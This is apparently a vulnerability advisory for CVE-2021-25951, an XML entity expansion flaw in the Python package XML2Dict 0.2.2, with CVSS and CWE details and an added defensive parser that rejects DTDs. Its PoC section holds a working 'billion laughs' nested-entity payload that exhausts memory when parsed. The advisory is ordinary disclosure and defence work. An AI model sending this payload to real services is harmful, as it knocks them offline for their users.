CVE-2021-25951

Date: June 30, 2021

Overview

XXE vulnerability in 'XML2Dict' version 0.2.2 allows an attacker to cause a denial of service.

Details

The PyPI module 'XML2Dict' is vulnerable to XML Entity Expansion because the function `parse()` does not restrict recursive entity references in the DTD of a specially crafted XML document. Due to this flaw, an attacker could load a file that defines multiple entities recursively, thus causing a denial of service.

PoC Details

The function `parse()` accepts an XML file as input and converts it to JSON. Because the function does not properly limit the number of recursive entity definitions, the entities can expand to an explosive amount of data when parsed, causing a denial of service.

PoC Code

from encoder import XML2Dict

xml2dic = XML2Dict()

# Nested entity definitions: each level references the previous one ten times.
doc = """<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ELEMENT lolz (#PCDATA)>
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
"""

xml2dic.parse(doc)
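As an added example that is not part of this advisory or of the XML2Dict project, the function below converts XML to a dict with the standard-library expat parser and refuses any document that carries a DOCTYPE, which is where the recursive entity definitions used by the PoC live. The sample documents, the function names and the dict layout are constructed for this illustration.

```python
import xml.parsers.expat


class DtdNotAllowed(ValueError):
    """The input carries a DOCTYPE; entity definitions live there, so it is refused."""


def parse_xml_to_dict(xml_text: str) -> dict:
    """Convert simple XML into nested dicts, refusing any document with a DTD.
    An element maps to its child dict, or to its text when it has no children;
    repeated sibling tags become lists. Attributes are ignored for brevity."""
    parser = xml.parsers.expat.ParserCreate()
    # One (children, text_parts) frame per open element; index 0 is the root.
    stack = [({}, [])]

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        # Fires at '<!DOCTYPE', before any <!ENTITY> is read, so no expansion
        # can start. The exception propagates out of parser.Parse().
        raise DtdNotAllowed(f"DOCTYPE '{name}' rejected: DTDs are not accepted")

    def start(tag, attrs):
        stack.append(({}, []))

    def chars(data):
        stack[-1][1].append(data)

    def end(tag):
        children, text_parts = stack.pop()
        value = children if children else "".join(text_parts).strip()
        parent = stack[-1][0]
        if tag not in parent:
            parent[tag] = value
        elif isinstance(parent[tag], list):
            parent[tag].append(value)
        else:
            parent[tag] = [parent[tag], value]

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.StartElementHandler = start
    parser.CharacterDataHandler = chars
    parser.EndElementHandler = end
    parser.Parse(xml_text, True)
    return stack[0][0]


def is_rejected(xml_text: str) -> bool:
    """True when the document is refused for carrying a DTD."""
    try:
        parse_xml_to_dict(xml_text)
    except DtdNotAllowed:
        return True
    return False


# Constructed samples: a benign document, and a two-level nested-entity
# document shaped like the advisory's PoC (which uses nine levels).
BENIGN_DOC = "<config><host>db.internal</host><port>5432</port><tag>a</tag><tag>b</tag></config>"
ENTITY_DOC = '<?xml version="1.0"?><!DOCTYPE x [<!ENTITY a "aaaa"><!ENTITY b "&a;&a;&a;&a;">]><x>&b;</x>'
```

Rejecting the whole DOCTYPE is stricter than limiting expansion depth, but it also removes external-entity (CWE-611) exposure in the same check.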

Affected Environments

0.2.2

Prevention

No fix version

Language: Python

Good to know:

Improper Restriction of XML External Entity Reference ('XXE')

CWE-611

Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')

CWE-776

Upgrade Version

No fix version available

Base Score (CVSS v3 metrics):
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): None
Scope (S): Unchanged
Confidentiality (C): None
Integrity (I): None
Availability (A): High

Base Score (CVSS v2 metrics):
Access Vector (AV): Network
Access Complexity (AC): Low
Authentication (AU): None
Confidentiality (C): None
Integrity (I): None
Availability (A): Partial